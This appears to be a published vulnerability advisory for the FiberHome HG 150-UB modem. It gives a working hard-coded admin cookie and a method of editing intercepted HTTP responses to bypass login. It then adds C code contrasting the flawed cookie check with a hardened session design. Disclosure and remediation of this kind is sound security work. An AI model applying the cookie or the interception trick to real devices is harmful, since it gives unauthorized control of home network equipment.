# Exploit Title: FiberHome VDSL2 Modem HG 150-UB Login Bypass
# Date: 04/03/2018
# Exploit Author: Noman Riffat
# Vendor Homepage: http://www.fiberhome.com/
The vulnerability is a plain-text, hard-coded cookie. Using any cookie manager extension, an attacker can bypass the login page by setting the following master cookie.
Cookie: Name=0admin
Then access the homepage, which no longer requires authentication.
http://192.168.10.1/
Because of the improper session implementation, there is a second way to bypass login. The response to an unauthenticated request for the homepage looks like this.
HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Tue, 03 Apr 2018 18:33:12 GMT
Set-Cookie: Name=; path=/
Content-Type: text/html
Connection: close
<html><head><script language='javascript'>
parent.location='login.html'
</script></head><body></body></html>HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Tue, 03 Apr 2018 18:33:12 GMT
Content-Type: text/html
Connection: close
<html>
<head>
.. continue to actual homepage source
The response is malformed: the login redirect is followed directly by a second HTTP response that carries the actual homepage. Intercepting the response in Burp Suite and modifying it to the following grants access to the homepage without authentication.
HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Tue, 03 Apr 2018 18:33:12 GMT
Set-Cookie: Name=; path=/
Content-Type: text/html
Connection: close
<html>
<head>
.. continue to actual homepage source
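
A defensive sketch of the two fixes this advisory implies, added here as an example and not taken from the vendor's firmware or the author's write-up: an unpredictable server-side session token replaces the fixed cookie value, and the handler returns right after sending the login redirect so no page content follows it. All function names, the 302 redirect and the /dev/urandom source are assumptions; is_authed_weak is a hypothetical reconstruction of the flawed check.

```c
#include <stdio.h>
#include <string.h>

#define TOKEN_HEX_LEN 32                      /* 16 random bytes, hex encoded */
static char session_token[TOKEN_HEX_LEN + 1]; /* empty = nobody is logged in */

/* Flawed check (hypothetical reconstruction): the cookie is a fixed string,
   so knowing the value is equivalent to being logged in. */
int is_authed_weak(const char *cookie) {
    return cookie != NULL && strcmp(cookie, "0admin") == 0;
}

/* Call only after a successful password check: mint an unpredictable token. */
int session_start(void) {
    unsigned char raw[TOKEN_HEX_LEN / 2];
    FILE *f = fopen("/dev/urandom", "rb");
    if (f == NULL) return -1;
    size_t n = fread(raw, 1, sizeof raw, f);
    fclose(f);
    if (n != sizeof raw) return -1;
    for (size_t i = 0; i < sizeof raw; i++)
        snprintf(session_token + 2 * i, 3, "%02x", raw[i]);
    return 0;
}

/* Hardened check: constant-time compare against the server-side token. */
int is_authed(const char *cookie) {
    if (cookie == NULL || session_token[0] == '\0') return 0;
    if (strlen(cookie) != TOKEN_HEX_LEN) return 0;
    unsigned char diff = 0;
    for (size_t i = 0; i < TOKEN_HEX_LEN; i++)
        diff |= (unsigned char)(cookie[i] ^ session_token[i]);
    return diff == 0;
}

/* Writes exactly one response into out; returns 1 only if the page was served. */
int handle_home(const char *cookie, char *out, size_t cap) {
    if (!is_authed(cookie)) {
        snprintf(out, cap, "HTTP/1.1 302 Found\r\nLocation: /login.html\r\n"
                           "Content-Length: 0\r\nConnection: close\r\n\r\n");
        return 0; /* stop here: no page bytes may follow the redirect */
    }
    snprintf(out, cap, "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
                       "Connection: close\r\n\r\n<html>home</html>");
    return 1;
}
```

The redirect is enforced by the server in the status line and the function returns before any page content is written, so nothing protected reaches the client for an intercepting proxy to keep.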
@cutehameed

commented Nov 18, 2018

Sir how to run the script?

@DarkcoderSe

commented Jun 30, 2019

Thanks for sharing!
